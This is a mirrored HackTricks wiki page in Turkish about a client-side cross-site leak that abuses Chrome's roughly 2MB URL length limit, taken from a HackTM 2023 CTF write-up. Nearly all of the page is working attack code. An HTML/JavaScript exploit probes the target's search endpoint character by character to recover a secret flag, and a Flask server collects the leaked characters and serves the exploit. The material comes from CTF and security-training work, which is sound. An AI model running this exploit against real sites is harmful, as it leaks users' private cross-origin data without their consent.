mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
72 lines
1.5 KiB
Markdown
72 lines
1.5 KiB
Markdown
# URL Maksimum Uzunluğu - İstemci Tarafı
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
[https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) adresinden kod
|
||
```html
|
||
<html>
|
||
<body></body>
|
||
<script>
|
||
;(async () => {
|
||
const curr = "http://secrets.wtl.pw/search?query=HackTM{"
|
||
|
||
const leak = async (char) => {
|
||
fetch("/?try=" + char)
|
||
let w = window.open(
|
||
curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2)
|
||
)
|
||
|
||
const check = async () => {
|
||
try {
|
||
w.origin
|
||
} catch {
|
||
fetch("/?nope=" + char)
|
||
return
|
||
}
|
||
setTimeout(check, 100)
|
||
}
|
||
check()
|
||
}
|
||
|
||
const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
|
||
|
||
for (let i = 0; i < CHARSET.length; i++) {
|
||
leak(CHARSET[i])
|
||
await new Promise((resolve) => setTimeout(resolve, 50))
|
||
}
|
||
})()
|
||
</script>
|
||
</html>
|
||
```
|
||
Sunucu tarafı:
|
||
```python
|
||
from flask import Flask, request
|
||
|
||
app = Flask(__name__)
|
||
|
||
CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
|
||
chars = []
|
||
|
||
@app.route('/', methods=['GET'])
|
||
def index():
|
||
global chars
|
||
|
||
nope = request.args.get('nope', '')
|
||
if nope:
|
||
chars.append(nope)
|
||
|
||
remaining = [c for c in CHARSET if c not in chars]
|
||
|
||
print("Remaining: {}".format(remaining))
|
||
|
||
return "OK"
|
||
|
||
@app.route('/exploit.html', methods=['GET'])
|
||
def exploit():
|
||
return open('exploit.html', 'r').read()
|
||
|
||
if __name__ == '__main__':
|
||
app.run(host='0.0.0.0', port=1337)
|
||
```
|
||
{{#include ../../banners/hacktricks-training.md}}
|